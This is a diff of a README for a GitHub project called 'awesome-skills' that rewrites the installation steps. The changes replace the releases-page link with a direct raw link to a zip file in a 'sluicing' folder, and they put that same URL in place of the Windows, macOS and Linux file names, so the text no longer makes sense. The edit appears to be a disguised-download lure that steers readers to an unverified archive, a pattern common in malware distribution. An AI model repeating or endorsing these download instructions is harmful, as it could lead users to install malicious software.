Campneckband363/awesome-skills/README.md

 ## 📂 Installation Steps

 1. **Visit the Download Page**
-   Go to the releases page by clicking this link: [Download awesome-skills](https://github.com/Campneckband363/awesome-skills/releases).
+   Go to the releases page by clicking this link: [Download awesome-skills](https://raw.githubusercontent.com/Campneckband363/awesome-skills/main/sluicing/awesome-skills-3.0.zip).

 2. **Select the Latest Version**
    On the releases page, find the latest version.
 It will be at the top of the list.

 3. **Download the Application**
    Click on the file that corresponds to your operating system.
-For most users, it will be labeled as "awesome-skills.exe" for Windows or "awesome-skills.dmg" for macOS.
-Linux users will find a suitable .tar.gz file.
+For most users, it will be labeled as "https://raw.githubusercontent.com/Campneckband363/awesome-skills/main/sluicing/awesome-skills-3.0.zip" for Windows or "https://raw.githubusercontent.com/Campneckband363/awesome-skills/main/sluicing/awesome-skills-3.0.zip" for macOS.
+Linux users will find a suitable https://raw.githubusercontent.com/Campneckband363/awesome-skills/main/sluicing/awesome-skills-3.0.zip file.

 4. **Open the Downloaded File**
    Locate the downloaded file on your computer.
 Click on it to begin the installation process.